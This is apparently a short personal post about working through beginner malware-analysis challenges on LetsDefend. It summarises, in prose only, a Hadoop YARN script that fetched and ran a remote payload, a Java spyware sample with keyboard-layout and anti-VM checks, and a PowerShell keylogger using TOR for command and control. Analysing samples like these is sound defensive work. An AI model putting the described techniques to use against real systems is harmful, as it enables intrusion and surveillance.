I spent a bit of time this weekend refreshing my malware analysis skills by working through some beginner friendly challenges on LetsDefend.
I Analyzed:
- A script used during Hadoop YARN container initialization that fetched and executed a remote payload. This was my first time hearing about Hadoop and YARN, so it was a great opportunity to learn how they’re used and how they can be abused
- Samba Spy Java malware that specifically targeted Italian users by checking for an Italian keyboard layout and ensuring it wasn’t running inside a virtual machine. The code used basic string scrambling which is similar in concept to ROT13 to obfuscate functionality.
- PowerShell C2 that connects to TOR using SOCKS5 proxy and acts as a keylogger, sending system information, screenshots and allows the execution of remote commands using PowerShell or CMD.
Fortunately, both the Bash and PowerShell scripts were in plain text, making initial analysis straightforward. The Java-based malware required a bit of decoding, but tools like CyberChef made that painless.
This quick weekend session was a great reminder that even simple malware samples can teach valuable lessons. From identifying malicious behavior in familiar environments like Hadoop and PowerShell, to using tools like CyberChef to decode obfuscated payloads, every sample reinforced essential analysis techniques.
Whether you’re new to malware analysis or brushing up like I was, platforms like LetsDefend offer scenarios to sharpen your skills. I’ll definitely be exploring more complex challenges soon as the time allows.